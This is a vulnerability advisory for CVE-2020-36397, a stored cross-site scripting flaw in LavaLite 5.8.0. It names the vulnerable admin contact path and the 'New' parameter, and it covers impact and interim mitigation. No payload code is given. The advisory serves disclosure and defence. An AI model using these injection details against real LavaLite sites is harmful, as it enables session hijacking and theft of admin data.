CVE-2020-36397

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in the /admin/contact/contact component of LavaLite version 5.8.0. The vulnerability allows authenticated attackers to inject arbitrary web scripts or HTML via a crafted payload entered into the "New" parameter of the contact feature. The injected payload is stored and executed in the context of the victim's browser when the stored data is rendered. [1][2]

Exploitation

An attacker must first have valid authentication to access the admin panel. Once authenticated, the attacker navigates to the /admin/contact/contact page and submits a crafted payload (e.g., containing malicious JavaScript) in the "New" parameter. The payload is stored in the application's database. When any user (including other administrators) views the contact page, the stored script executes in their browser. No user interaction beyond viewing the page is required for the stored script to execute. [1][2]

Impact

Successful exploitation allows the attacker to execute arbitrary web scripts or HTML in the context of the affected admin page. This could lead to session hijacking, defacement, or theft of sensitive information visible in the admin interface. The impact is limited to authenticated users of the admin panel, but the stored nature increases the risk of propagation to other administrators. [1][2]

Mitigation

As of the published references, no official patch or fixed version has been released by the vendor. The project repository on GitHub [2] lists the issue, but no commit or release addressing the vulnerability is available. Users should monitor the repository for updates and consider temporarily restricting access to the admin contact feature until a fix is deployed. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the last update. [1][2]